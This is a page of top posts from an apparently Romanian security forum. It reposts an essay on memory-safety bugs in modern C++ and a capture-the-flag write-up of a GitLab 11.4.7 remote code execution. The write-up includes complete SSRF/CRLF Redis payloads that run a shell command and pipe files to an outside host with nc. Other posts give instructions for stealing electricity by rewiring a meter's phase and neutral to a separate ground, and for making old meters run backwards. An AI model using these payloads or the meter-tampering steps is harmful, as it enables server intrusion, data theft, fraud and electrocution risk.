Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 04/25/19 in all areas

  1. Daca aveti cont pe blockchain si il verificati (cu id) veti primi/ati primit deja niste Stellar (XLM). Daca nu, va puteti face cont aici https://www.blockchain.com/getcrypto si dupa verificare id va crediteaza contul cu ceva sume random. Majoritatea spun ca au primit echivalentul a 20-30 eur. Eu am primit echivalentul a 45 eur. XLM-ul se poate converti apoi in ETH sau BTC (sau altele) pe site-uri gen binance sau alte echivalente. Spor!
    3 points
  2. 1 point
  3. Modern C++ Won't Save Us 2019-04-21 by alex_gaynor I'm a frequent critic of memory unsafe languages, principally C and C++, and how they induce an exceptional number of security vulnerabilities. My conclusion, based on reviewing evidence from numerous large software projects using C and C++, is that we need to be migrating our industry to memory safe by default languages (such as Rust and Swift). One of the responses I frequently receive is that the problem isn't C and C++ themselves, developers are simply holding them wrong. In particular, I often receive defenses of C++ of the form, "C++ is safe if you don't use any of the functionality inherited from C"1 or similarly that if you use modern C++ types and idioms you will be immune from the memory corruption vulnerabilities that plague other projects. I would like to credit C++'s smart pointer types, because they do significantly help. Unfortunately, my experience working on large C++ projects which use modern idioms is that these are not nearly sufficient to stop the flood of vulnerabilities. My goal for the remainder of this post is to highlight a number of completely modern C++ idioms which produce vulnerabilities. Hide the reference use-after-free The first example I'd like to describe, originally from Kostya Serebryany, is how C++'s std::string_view can make it easy to hide use-after-free vulnerabilities: #include <iostream> #include <string> #include <string_view> int main() { std::string s = "Hellooooooooooooooo "; std::string_view sv = s + "World\n"; std::cout << sv; } What's happening here is that s + "World\n" allocates a new std::string, and then is converted to a std::string_view. At this point the temporary std::string is freed, but sv still points at the memory that used to be owned by it. Any future use of sv is a use-after-free vulnerability. Oops! C++ lacks the facilities for the compiler to be aware that sv captures a reference to something where the reference lives longer than the referent. The same issue impacts std::span, also an extremely modern C++ type. Another fun variant involves using C++'s lambda support to hide a reference: #include <memory> #include <iostream> #include <functional> std::function<int(void)> f(std::shared_ptr<int> x) { return [&]() { return *x; }; } int main() { std::function<int(void)> y(nullptr); { std::shared_ptr<int> x(std::make_shared<int>(4)); y = f(x); } std::cout << y() << std::endl; } Here the [&] in f causes the lambda to capture values by reference. Then in main x goes out of scope, destroying the last reference to the data, and causing it to be freed. At this point y contains a dangling pointer. This occurs despite our meticulous use of smart pointers throughout. And yes, people really do write code that handles std::shared_ptr<T>&, often as an attempt to avoid additional increment and decrements on the reference count. std::optional<T> dereference std::optional represents a value that may or may not be present, often replacing magic sentinel values (such as -1 or nullptr). It offers methods such as value(), which extract the T it contains and raises an exception if the the optional is empty. However, it also defines operator* and operator->. These methods also provide access to the underlying T, however they do not check if the optional actually contains a value or not. The following code for example, simply returns an uninitialized value: #include <optional> int f() { std::optional<int> x(std::nullopt); return *x; } If you use std::optional as a replacement for nullptr this can produce even more serious issues! Dereferencing a nullptr gives a segfault (which is not a security issue, except in older kernels). Dereferencing a nullopt however, gives you an uninitialized value as a pointer, which can be a serious security issue. While having a T* with an uninitialized value is also possible, these are much less common than dereferencing a pointer that was correctly initialized to nullptr. And no, this doesn't require you to be using raw pointers. You can get uninitialized/wild pointers with smart pointers as well: #include <optional> #include <memory> std::unique_ptr<int> f() { std::optional<std::unique_ptr<int>> x(std::nullopt); return std::move(*x); } std::span<T> indexing std::span<T> provides an ergonomic way to pass around a reference to a contiguous slice of memory and a length. This lets you easily write code that works over multiple different types; a std::span<uint8_t> can point to memory owned by a std::vector<uint8_t>, a std::array<uint8_t, N>, or even a raw pointer. Failure to correctly check bounds is a frequent source of security vulnerabilities, and in many senses span helps out with this by ensuring you always have a length handy. Like all STL data structures, span's operator[] method does not perform any bounds checks. This is regrettable, since operator[] is the most ergonomic and default way people use data structures. std::vector and std::array can at least theoretically be used safely because they offer an at() method which is bounds checked (in practice I've never seen this done, but you could imagine a project adopting a static analysis tool which simply banned calls to std::vector<T>::operator[]). span does not offer an at() method, or any other method which performs a bounds checked lookup. Interestingly, both Firefox and Chromium's backports of std::span do perform bounds checks in operator[], and thus they'll never be able to safely migrate to std::span. Conclusion Modern C++ idioms introduce many changes which have the potential to improve security: smart pointers better express expected lifetimes, std::span ensures you always have a correct length handy, std::variant provides a safer abstraction for unions. However modern C++ also introduces some incredible new sources of vulnerabilities: lambda capture use-after-free, uninitialized-value optionals, and un-bounds-checked span. My professional experience writing relatively modern C++, and auditing Rust code (including Rust code that makes significant use of unsafe) is that the safety of modern C++ is simply no match for memory safe by default languages like Rust and Swift (or Python and Javascript, though I find it rare in life to have a program that makes sense to write in either Python or C++). There are significant challenges to migrating existing, large, C and C++ codebases to a different language -- no one can deny this. Nonetheless, the question simply must be how we can accomplish it, rather than if we should try. Even with the most modern C++ idioms available, the evidence is clear that, at scale, it's simply not possible to hold C++ right. [1] I understood this to be referring to raw pointers, arrays-as-pointers, manual malloc/free, and other similar features. However I think it's worth acknowledging that given that C++ explicitly incorporated C into its specification, in practice most C++ code incorporates some of these elements. Hi, I'm Alex. I'm currently at a startup called Alloy. Before that I was a engineer working on Firefox security and before that at the U.S. Digital Service. I'm an avid open source contributor and live in Washington, DC. Sursa: https://alexgaynor.net/2019/apr/21/modern-c++-wont-save-us/
    1 point
  4. GitLab 11.4.7 Remote Code Execution 21 Apr 2019 Capture The FlagWeb HackingExploit Walkthrough TL;DR SSRF targeting redis for RCE via IPv6/IPv4 address embedding chained with CLRF injection in the git:// protocol. Video watch on YouTube Introduction At the Real World CTF, we came across an interesting web challenge called flaglab. The description said: "You might need a 0day" there was a link to the challenge, and there was a download link for a docker-compose.yml file. Upon visiting the challenge site, we are greeted by a GitLab instance. The docker-compose.yml file can be used to set up a local version of this very instance. Inside the docker-compose.yml, the docker image is set to gitlab/gitlab-ce:11.4.7-ce.0. Upon doing a google search on the gitlab version, we stumbled upon a blog post on GitLab Patch Release, and it seemed like it was the latest version - the blog post was created on Nov 21, 2018 and the CTF was happening on Dec 1, 2018. So we thought we would never find an 0day in GitLab due to its huge codebase and it's just a waste of time... But as it turns out, we were wrong on these assumptions. During a post CTF dinner with other teams, some people from RPISEC told us that it was not the latest version - there was a newer version 11.4.8 and the commit history of the newer version reveals several security patches. One of the bugs was a "SSRF in Webhooks" and it was reported by nyangawa of Chaitin Tech (which is also the company that organized the Real World CTF). Knowing all this, it was aactually a fairly simple challenge, and I was mad because we gave up without doing enough research. So after the event, I tried to solve this challenge from the knowledge gained so far. Setup Let's start setting up a local copy of the vulnerable version of GitLab. We can start by looking at the docker-compose.yml file. web: image: 'gitlab/gitlab-ce:11.4.7-ce.0' restart: always hostname: 'gitlab.example.com' environment: GITLAB_OMNIBUS_CONFIG: | external_url 'http://gitlab.example.com' redis['bind']='127.0.0.1' redis['port']=6379 gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password') ports: - '5080:80' - '50443:443' - '5022:22' volumes: - './srv/gitlab/config:/etc/gitlab' - './srv/gitlab/logs:/var/log/gitlab' - './srv/gitlab/data:/var/opt/gitlab' - './steg0_initial_root_password:/steg0_initial_root_password' - './flag:/flag:ro' From the above YAML file, the following conclusions can be made: The docker image used is GitLab Community Edition 11.4.7 gitlab-ce:11.4.7-ce.0. Redis server runs on port 6379 and it is listening to localhost. The rails initial_root_password is set using a file called steg0_initial_root_password There are some ports mapped from the docker container to our machine, which exposes the application outside the container for us to fiddle with. We'll be using the HTTP service running on port 5080. Additionally, there are volumes, which mounts the local files and folders inside the docker container. For example, ./srv/gitlab/logs on our machine will be mounted to /var/log/gitlab inside the docker container. The password file and the flag is also copied into the container. You can create these required files and folders using the following commands: # Create required folders for the gitlab logs, data and configs. leave it empty mkdir -p ./srv/gitlab/config ./srv/gitlab/data ./srv/gitlab/logs # Create a random password using python python3 -c "import secrets; print(secrets.token_urlsafe(16))" > ./steg0_initial_root_password # ==OR== # Choose your own password echo "my_sup3r_s3cr3t_p455w0rd_4ef5a2e1" > ./steg0_initial_root_password # Create a test flag echo "RWCTF{this_is_flaglab_flag}" > ./flag Now that we have the required files and folders, we can start the docker container using the following command. $ docker-compose up The process of downloading the base image and building the gitlab instance might take a few minutes. After you start seeing some logs, you should be able to browse to http://127.0.0.1:5080/ for the vulnerable GitLab version. Now it's time to configure the chrome browser to use a proxy. You can do it manually by going to the settings and changing it there, or you can do it via the command-line which is a bit handier. /path/to/chrome --proxy-server="127.0.0.1:8080" --profile-directory=Proxy --proxy-bypass-list="" I had problems with the Burp Suite proxy not being able to intercept the localhost requests even with the bypass list being empty. So a quick workaround was to add an entry in the hosts file like the following. 127.0.0.1 localhost.com Browsing to http://localhost.com:5080 now lets us access GitLab through the Burp Suite proxy. That's all for the setup! The Bugs As you already know, we thought that 11.4.7 was the latest version of GitLab at that time, but in fact, there was a newer version 11.4.8 which had many security patches in the commits. One of the bugs was related to SSRF and it even referenced to Chaitin Tech, which is the company responsible for hosting the Real World CTF. Additionally we also know that the flag file is located in the /(root of the file system), so we need an Arbitrary File Read or a Remote Code Execution vulnerability. Now let's have a look at those patches for SSRF and other potential bugs. At the top, you'll find 3 security related commits. There's our SSRF in Webhooks, we also have an XSS, but it's rather not that interesting for us, and finally, we have a CRLF injection (Carriage-Return/Line-Feed) which is basically newline injections. If we look at the fix for the SSRF issue and scroll down a bit, you'll see that there are unit tests to confirm the fix for the issue. These tests tell us how to exploit the bug, which is exactly what we wanted. Looking at some test cases, apparently, special IPv6 addresses which have an IPv4 address embedded inside them can bypass the SSRF checks. # SSRF protection Bypass https://[0:0:0:0:0:ffff:127.0.0.1] The other issue was a CRLF vulnerability in Project hooks, scrolling down to test cases you can see it's merely URLs with newlines. Either it's URL encoded, or simply they are just regular newlines. Now the question is, can these bugs help us in exploiting GitLab to get the flag? Yes, they can. By chaining these 2 bugs, we can get a Remote Code Execution. It's actually a typical security issue. Basically, an SSRF or Server Side Request Forgery is used to target the local internal Redis database, which is used extensively for different types of workers. So if you can push a malicious worker, you might end up with a Remote Code Execution vulnerability. In fact, GitLab has been exploited like this several times before, and there are many bug bounty writeups which are similar to this. I don't remember where I first came acorss this technique, but I believe it's @Agarri_FR back in 2015, tweeted about this and also there was a blog post by him from 2014. I did come across many bug bug bounty writeups, so everyone who's into web security should know about this. Exploitation Now onto the fun stuff, first, let's see if we can trigger an SSRF somewhere. At first, I thought about targeting the Webhooks (used to send requests to a URL whenever any events are fired in the repository) like it's mentioned here. However, when I clicked on the create a new project, I saw multiple ways to import a project and one of them was Repo by URL, which would basically fetch the repo when you specify a URL. We can import a repo over http://, https:// and git://. So to test this, we can try to import the repo using the following URL. http://127.0.0.1/test/somerepo.git But we'd get the error that "Import URL is blocked: Requests to localhost are not allowed". Now, we can try the bypass using the special IPv6 address. So if we replace the import URL to the following. http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git Before importing using this URL, we need a server to listen on port 1234 to confirm the SSRF. To do that, we can get a root shell on the docker container to install netcat and then listen on port 1234 to see if the SSRF is triggered. First, let's go ahead and list out all the running Docker containers to know which one to get a shell on. # get a list of running docker containers $ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS NAMES bd9daf8c07a6 gitlab/gitlab-ce:11.4.7-ce.0 ... ... ... ... We just have one running, and it's the GitLab 11.4.7. We can get a shell on the container using the following command by specifying a container ID. $ docker exec -i -t bd9daf8c07a6 "/bin/bash" Here, bd9daf8c07a6 is the container ID. -i means interaction with /bin/bash. -t means create tty - a pseudo terminal for the interaction. Now that we have the shell, we can install netcat so that we can set up a simple server to listen for incoming SSRF requests. root@gitlab:~ apt update && apt install -y netcat Setting up a raw TCP server is simple as the following command. root@gitlab:~ nc -lvp 1234 Here, -l is to tell netcat that we have to "listen". -v is for verbose output. -p is to specift the port number on which the server has to bind on. Now that we have our SSRF testing setup done let's make the same import request to see if we can trigger the SSRF. Additionally, Instead of specifying the URL from the web application in the browser, we can use the Burp Suite's repeater to quickly modify the HTTP request to our needs and send it away. To do this, we can modify the old "Repo by URL" request. We can update the URL to http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git and the name of the project to something that isn't already there and send the request. As you can see from the above image, we did get the request trapped in our netcat listener, and this confirms that there is SSRF which can talk to internal services, which in our case was the local netcat server on port 1234, which means that we can talk to the internal Redis server running on port 6379(specified in the docker-compose.yml). But what is Redis and how does GitLab use it? Redis is an in-memory data structure store, used as a database, cache and message broker. GitLab uses it in different ways like storing session data, caching and even background job queues. Redis uses a straightforward, plain text protocol, which means you can directly connect to Redis using netcat and start messing around. # quick test with redis root@gitlab:~ nc 127.0.0.1 6379 blah - ERR unknown command 'blah' set liveoverflow test +OK asd - ERR unknown command 'asd' get liveoverflow $4 test Redis is a simple ASCII text-based protocol, but HTTP is also a simple ASCII text-based protocol. Now, what would happen if we try to send the HTTP request to Redis? Would Redis execute commands? Let's try. # http request test with redis root@gitlab:~ nc 127.0.0.1 6379 GET /test/ssrf.git/info/refs?service=git-upload-pack HTTP/1.1 Host: [0:0:0:0:0:ffff:127.0.0.1]:1234 User-Agent: git/2.18.1 Accept: */* Accept-Encoding: deflate, gzip Pragma: no-cache - Err wrong number of arguments for 'get' command root@gitlab:~ It gives us an error saying that there are wrong a number of arguments for the 'get' command which makes sense because from the earlier example, we know how 'get' command in Redis works. But, then we were dropped back to the shell, however from earlier, we saw that Redis doesn't quit even if there errors, so what is actually going on? Pasting the raw HTTP protocol data line by line gives us the answer. The second line Host: [0:0:0:0:0:ffff:127.0.0.1]:1234 is responsible for the Redis terminating the connection unexpectedly. This happens because SSRF to Redis is a huge issue and Redis has implemented a "fix" for this. If the string "Host:" is present to the Redis server as a command, it'll know that this is an HTTP request trying to smuggle some Redis commands and stops the execution by closing the connection. Only if we could get our payload in-between the first line(GET /test...) and the second(Host: ...), we can make this work. Since we control the first line of the HTTP request, can we inject some newlines and add more commands? *cough* CRLF *cough* Yes, remember the CRLF injection bug we saw in the Security Release and the commit history, we can use that! From the commit history's test cases, we can see that the injection is pretty straight forward. By merely adding newlines or URL encoding them would do the trick for example. http://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git # Expected to be Converted To http://127.0.0.1:333/ test blah.git However, this didn't work out. Not sure why this doesn't work, but by changing the protocol from http:// to git:// makes it work. # Does work :) git://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git # Expected to be Converted To git://127.0.0.1:333/ test blah.git Now that we know what Redis is, where it's being used and how we can add newlines using the CRLF injection, we can move on into creating a payload for the RCE. The idea is to talk to this internal Redis server by using the SSRF vulnerability and smuggling one protocol(Redis) in another(git://) and get the Remote Code Execution. Fortunately, @jobertabma has already figured out the payload. Let's have a look at it. multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec As you know, Redis can also be used to background job queues. These jobs are handled by Sidekiq, which is a background tasks processor for ruby. We can look at the list of sidekiq queues to see if there's anything that we can use. ... - [default, 1] - [pages, 1] - [system_hook_push, 1] - [propagate_service_template, 1] - [background_migration, 1] ... There's system_hook_push which can be used to handle the new jobs and it's the same one which is being used in the actual payload. Now to execute code/command, we need a class that would do it for us, think of this as a gadget. Fortunately, Jobert has also found the right class - gitlab_shell_worker.rb. class GitlabShellWorker include ApplicationWorker include Gitlab::ShellAdapter def perform(action, *arg) gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend end end As you can see, this is exactly the class we've been looking for. Now this GitlabShellWorker is called with some arguments like class_eval and the actual command which needs to be executed, and in our case, it's the following. open('| COMMAND_TO_BE_EXECUTED').read In the actual payload, we push the queue onto system_hook_push and get the GitlabShellWorker class to run our commands. Now that we have everything we need for the exploitation, we can craft the final payload and send it over. Before doing that, I need to set up a netcat listener on our main machine (192.168.178.21) to receive the flag. $ nc -lvp 1234 The final payload looks like the following. multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec exec Some points to note: In the payload above, redis commands need to have a whitespace before it in every line - no clue why. cat /flag | nc 192.168.178.21 1234 - we are reading the flag and sending it over to our netcat listener. Added an extra exec command just so that the first one is executed properly and the second one would be concatenated with the next line instead of the first line. This is done so that important part of the payload won't break. The final import URL with the payload looks like this: # No Encoding git://[0:0:0:0:0:ffff:127.0.0.1]:6379/ multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec exec /ssrf.git # URL encoded git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20192%2E168%2E178%2E21%201234%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git Now if you send the "Repo by URL" request with this URL, we get the flag! Conclusion and Takeaways This was a simple challenge, and after hearing about a newer version from the RPISEC team, and after seeing one of the reported bugs was by Chaitin Tech (organizers), it was just a matter of 2-3 hours to solve this challenge. Do proper research before jumping into conclusions. It's all about the mindset. Resources docker-compose.yml Video Explanation LiveOverflow (and PwnFunction) wannabe hacker... Sursa: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
    1 point
  5. Ma ajuta si pe mine careva ? Stau la casa,am contor clasic e pe stalp asta-i toata faza. Oare chestia asta ar merge? Am dat copy paste de undeva. este o metoda foarte simpla si nici nare cun sa te prinda , intodeauna idiferent de contor fie electronic fie clasic( de ala cu rotita)sau cu cartela intodeauna intran faza daca sunteti atenti bornele de la nul sunt in partea stanga a contorului (asta pentru electricienii care cunosc pentru restu imi pare rau) ele sunt comune ei acum daca stati la casa inversati faza cu nulu de pe stalp sau daca sati la bloc inversati faza si nulu din cutia verde sau din cutia unde sunt contoarele inversati faza si nulu din cablu de alimentare , in cazul asta va intra nulu prin contor si faza nu , ei acum va faceti un nul separa adica va legati de teava de apa sau bagati oteava zincata in pamant si legati un fir de ea (de preferinta teava sa aiba 5 sau mai multi metri) cu acest fir si o faza dintro priza sau o doza puteti fura curent linistiti , acum spor la treaba
    1 point
  6. La orice fel de contor electric monofazat sunt patru borne, dupa cum urmeaza: - Borna 1: Faza intrare - Borna 2: Faza iesire - Borna 3: Null intrare - Borna 4: Null iesire Note: - De regula, 3 si 4 este una si aceiasi borna (fac corp comun in interior). - La contoarele clasice (inductie) intre borna 1 si borna 2 vine o bobina de cateva spire ce face un camp magnetic si in functie de intensitatea acestuia (de consum), se mareste sau se micsoreaza rotatia acelui ax cu volanta. - Tot la contoarele vechi, se putea bobina un transformator cu appx. 2 V, cu ajutorul caruia puteai aplica tensiune bobinei contorului, astfel incat acesta se invartea invers. La un alt model de contor, au facut pinioane duble cu cricket ca la orice sens de rotatie, indexul numeric sa mearga inainte. Hint: Majoritatea contoarelor noi au port infrarosu. Daca va place hacking-ul, cumparati un contor de acelasi model (se cumpara de la magazine specializate), il puneti pe masa si va jucati cu el. Mai departe va descurcati voi (sau nu). Daca aveti alte intrebari legate de instalatii electrice si/sau automatizari, putem face un thread dedicat pentru asta. PS: fara furaciuni.
    1 point
×
×
  • Create New...